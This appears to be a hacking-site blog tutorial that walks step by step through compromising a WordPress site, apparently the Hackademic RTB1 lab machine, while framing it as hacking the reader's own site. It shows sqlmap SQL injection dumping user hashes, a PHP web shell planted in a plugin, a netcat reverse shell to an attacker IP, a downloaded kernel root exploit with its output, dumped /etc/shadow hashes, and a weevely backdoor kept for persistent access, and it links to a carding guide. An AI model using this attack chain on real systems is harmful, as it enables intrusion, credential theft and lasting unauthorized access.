All About HackingBlackhat Hacking ToolsFree CoursesHacking

How hackers target and hack your site 2023

In this article we will learn about How hackers target and hack your site.

Overview[How hackers target and hack your site]:

The answer to this question can be difficult to determine, simply because there are many ways to hack sites. Our goal in this article is to show you the techniques that hackers most often use to target and hack your site!

Let’s say this is your website: hack-test.com

Let’s ping this site to get the server IP:

Now we have 173.236.138.113 – this is the server IP where our target site is hosted.

To find other sites hosted on the same server, we will use sameip.org:

Same IP
26 sites hosted on IP Address 173.236.138.113

IDDomainSite Link
1hijackthisforum.comhijackthisforum.com
2sportforum.netsportforum.net
3freeonlinesudoku.netfreeonlinesudoku.net
4cosplayhell.comcosplayhell.com
5videogamenews.orgvideogamenews.org
6gametour.comgametour.com
7qualitypetsitting.netqualitypetsitting.net
8brendanichols.combrendanichols.com
98ez.com8ez.com
10hack-test.comhack-test.com
11kisax.comkisax.com
12paisans.compaisans.com
13mghz.commghz.com
14debateful.comdebateful.com
15jazzygoodtimes.comjazzygoodtimes.com
16fruny.comfruny.com
17vbum.comvbum.com
18wuckie.comwuckie.com
19force5inc.comforce5inc.com
20virushero.comvirushero.com
21twincitiesbusinesspeernetwork.comtwincitiesbusinesspeernetwork.com
22jennieko.comjennieko.com
23davereedy.comdavereedy.com
24joygarrido.comjoygarrido.com
25prismapp.comprismapp.com
26utiligolf.comutiligolf.com

Twenty-six other websites are hosted on this server [173.236.138.113]. Many hackers will target all other sites on the same server in order to hack your site. But for the purpose of study, we will target your site only and put aside hacking the other sites on same server.

We’ll need more information about your site, such as:

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

Let’s start with finding your site’s DNS records. We will use the website “Who.is” to achieve this:

We have discovered that your site DNS records are:

HACK-TEST.COM DNS RECORDS

RecordTypeTTLPriorityContent
hack-test.comA4 hours173.236.138.113 ()
hack-test.comSOA4 hoursns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.comNS4 hoursns1.dreamhost.com
hack-test.comNS4 hoursns3.dreamhost.com
hack-test.comNS4 hoursns2.dreamhost.com
www.hack-test.comA4 hours173.236.138.113 ()

Let’s determine the web server type:

As you see, your site web server is Apache. We will determine its version later.

HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7

Now it is time to find your Doman Registrar and your name, address, email and phone:

We have now got your registrar and other vital information about you. We can find the type of scripts on your site (the OS type, web server version) by using a cool tool in backtrack 5 R1 called Whatweb:

Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.

To do this, we will use nmap:

1 – Find services that run on server

[sourcecode]
root@bt:/# nmap -sV hack-test.com

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
[/sourcecode]

2 – Find server OS

[sourcecode]
root@bt:/# nmap -O hack-test.com

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh

80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
[/sourcecode]

Only port 80 is open and OS is Linux 2.6.22(Fedora Core 6)

Now that we have gathered all the important information about your site, let’s scan it for vulnerabilities like

Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF, and so forth.

We will use Nikto.pl to gather info, perhaps, some vulnerabilities:

[sourcecode]
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com

– Nikto v2.1.4

—————————————————————————

+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03

—————————————————————————

+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)

—————————————————————————

+ 1 host(s) tested
[/sourcecode]

We will also use W3AF. You can find this tool in backtrack 5 R1

[sourcecode]
root@bt:/pentest/web/w3af# ./w3af_gui

Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0

w3af – Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
[/sourcecode]

We will insert our site URL and choose full audit option:

After some time, the scan will finish and you will see

Your site is vulnerable to sql injection, xss and others!

Let’s investigate the sql injection vulnerability:

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

This is the vulnerable url and cat is the vulnerable parameter.

So, let’s exploit this vulnerability:

We will find that exploitating this vuln failed, so we will use sqlmap to the job and dump all database information that we need to hack this site J

Using sqlmap with –u url

After some seconds you will see

Type n and press enter to continue

As you see your site is vulnerable to error-based sql injection and your mysql database version is 5

Let’s find all databases in your site by adding “–dbs ”

Now we found 3 databases

We will dump wordpress database tables by adding “–D wordpress –tables ”

We will find all wordpress tables

We want to dump “wp_users” table, so we will find all users (admin?) information (user is and password hash) and try to crack hash and enter wordpress control panel ( wp-admin)

We will columns of “wp_users” table by adding “-T wp_users –columns ”

We will find 22 columns

We just need to dump to columns, so we will dump (user_login and user_pass ) columns by adding

-C user_login,user_pass –dump

We will find important information; we found now users and pass hashes

but we want to crack those hashes to clear text passwords. We will use the online site “http://www.onlinehashcrack.com/free-hash-reverse.php

And try to crack this hash 7CBB3252BA6B7E9C422FAC5334D22054

And clear text password is q1w2e3

And user name is “GeorgeMiller”

We will login with these details in “wp-admin ”

And we are in!

Ok let’s try to upload php web shell to run some linux commands on your site server J

We will edit a plugin in wordpress called “Textile ” or any plugin you found in plugins page.

And choose to edit it

We will insert php web shell instead of real plugin. After we’ve done this, we will hit “update file” and browse to our new php shell

Woo, the php shell works. Now we can manipulate your site files, but we want only to get root on your server and hack all other sites too.

We will choose “back-connect “tab from php web shell and make back connection to our ip “192.168.1.6” on port “5555”

But before we hit connect, we first make netcat listen on port “5555” on our attacker machine

Now hit connect and you will see:

Let’s try some linux commands

[sourcecode]
id

uid=48(apache) gid=489(apache) groups=489(apache)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
[/sourcecode]

Id command is used to show us what user id, group.

pwd command is used to show us our current path on server

uname –a command is used to show us some information about kernel version

Ok, now we knew that server kernel version is 2.6.31.5-127.fc12.1686

Let’s search in exploit-db.com for exploit to this version or newer version

We will type “kernel 2.6.31 ”

DateDescriptionPlat.Author
2009-10-15Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service904linuxSimon Vallet
2009-08-31Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte Stack Disclosure Exploit1370linuxJon Oberheide
2009-08-25Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure1059linuxJon Oberheide
2009-08-04Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit1064linuxJon Oberheide

None of these will fit the bill as none of them are privilege escalation exploits.  This next one, however, is.

DateDescriptionPlat.Author
2010-10-19Linux RDS Protocol Local Privilege Escalation9977linuxDan Rosenberg

http://www.exploit-db.com/exploits/15285

I opened this url and copied this link

http://www.exploit-db.com/download/15285

And made this command on my netcat shell

[sourcecode]
wget http://www.exploit-db.com/download/15285 -O roro.c
–2011-12-28 00:48:01– http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com… 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
–2011-12-28 00:48:02– http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c’

0K …… 100% 29.7K=0.2s

[/sourcecode]

We used wget command to fetch exploit from exploit-db.com and used –O to rename it to roro.c

Note: linux kernel exploits mostly is being delopped in c language so we saved it in .c extension, just view exploit source and you will find

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
intprep_sock(intport)
{
ints, ret;
structsockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0) {
printf(“[*] Could not open socket.n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));

All the above lines indicate that this is exploit is written in C language

After we saved our exploit on server, we will compile it to elf format by typing

gcc roro.c –o roro

And run our exploit by typing

[sourcecode]
./roro

[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer…
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[/sourcecode]

And after that we type

Id

We will find that we are root J

uid=0(root) gid=0(root)

We can now view /etc/shadow file

[sourcecode]
cat /etc/shadow

root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::
mailnull:!!:14557::::::
smmsp:!!:14557::::::
smolt:!!:14557::::::
sshd:!!:14557::::::
pulse:!!:14557::::::
gdm:!!:14557::::::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
mysql:!!:14981::::::
[/sourcecode]

And view /etc/passwd file

[sourcecode]cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:”Saslauthd user”:/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash

[/sourcecode]

We can crack all users passwords with the “john the ripper” tool.

But we will not do this; we want to maintain access on this server so we can come to visit/hack it any time J

We will use weevely to a small and encoded php backdoor with the password protected and upload this php backdoor to our server.

Let’s do it

1 – weevely usage options :

[sourcecode]
root@bt:/pentest/backdoors/web/weevely# ./main.py –

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

Usage: main.py [options]

Options:
-h, –help show this help message and exit
-g, –generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, –output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, –command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, –terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, –cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form ‘label,url,password’ where label is
optional.
-p PASSWORD, –password=PASSWORD
Password of the encrypted backdoor .

-u URL, –url=URL Remote backdoor URL .
[/sourcecode]

2 – Creating a php backdoor with password koko by using weevely:

[sourcecode]
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file ‘hax.php’ created with password ‘koko’.

[/sourcecode]

3 – Upload our php backdoor to server using php web shell

And after we upload it we will connect to it using

[sourcecode]
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .

[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]
[/sourcecode]

Testing our hax.php backdoor

Related article:Amazone carding 2023 method

Conclusion:

In this article we have learned some techniques that hackers use to target and hack your website and your server. I hope you liked and enjoyed this article.

Leave a Reply

Your email address will not be published. Required fields are marked *